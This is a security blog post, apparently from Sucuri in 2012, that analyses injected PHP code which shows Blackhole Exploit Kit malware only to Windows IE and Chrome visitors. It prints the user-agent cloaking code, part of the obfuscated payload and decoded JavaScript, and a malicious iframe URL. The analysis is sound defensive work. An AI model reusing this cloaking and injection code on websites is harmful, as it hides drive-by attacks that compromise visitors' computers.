The Latest in IT Security

Ask Sucuri: Why I Only Get Malware Warning on Certain Browsers?

10
Jan
2012

(Sucuri.net) A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.

After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.

Once we got access to the site, we learned why. It had the following code on the index.php file:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER[‘HTTP_USER_AGENT’];
$botsUA = array(‘12345′,’alexa.com’,’anonymouse.org’,’bdbrandprotect.com’,
‘blogpulse.com’,’bot’,’buzztracker.com’,’crawl’,’docomo’,’drupal.org’,
‘httpclient’,’internetseer.com’,’linux’,’macintosh’,’mac os’,’magent’,’mailru’,
‘netcraft’,’openacoon.de’,’opera mini’,’opera mobi’,’playstation’,
‘rssreader’,’slurp’,’snoopy’,’spider’,’spyder’
,’validator’,’virus’,’vlc media player’,’webcollage’,’wordpress’,’x11′,
‘iphone’,’android’, ‘firefox’);
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
echo(base64_decode(“PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0icmYzIi5zcGx.

Do you know what it does? It checks the user agent (aka browser) of the person visiting the site and only displays the malware if it does not contain the strings “Linux”, “Mac”, “Iphone”, “Firefox”, “Bot”, “Virus”, etc.

So if you are on a Mac, or Linux, or using Firefox, nothing would happen. However, when you go to the site using Windows and IE or Chrome, it would attempt to compromise your browser/computer.

This makes much harder for the owner of the site to detect the malware and take action to remove it. That’s why on our malware scanner, we use multiple Browsers, referrers, and user agents to try to catch any hidden malicious code. So just because you can’t see it, doesn’t mean it is not there :)

Technical details

If you are curious about what that code above does after being decoded, it prints the following JavaScript to the bottom of the site:

<script>if(window.document)a=”rf3″.split(“5236”).pop+’qwe’;a=a[“spli”+”t”](“”).reverse()[“po”+”p”]();if(a==’f’||a==”\n”)
f=[5,5,101,98,28,36,96,107,95,113,105,97,106,112,42,99,97,112,65,104,97,105,97,
106,112,111,62,117,80,93,99,74,93,105,97,36,35,94,107,96,117,35,37,87,44,89,37,
119,5,5,5,101,98,110..

When this script read by the browser, it will create an iFrame to http://vvesek.freetcp.com/i/i.php?go=1 (and variations – these domains change often), where the actual Blackhole Exploit Kit code will come from.

Conclusion

This is just an example why sometimes users complain of malware when visiting a site, but the owner doesn’t see it. This may also lead to Sucuri scanner alerts and the owner can’t find the issue. If you have any questions, let us know.

Leave a reply


Categories

SATURDAY, DECEMBER 14, 2019
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments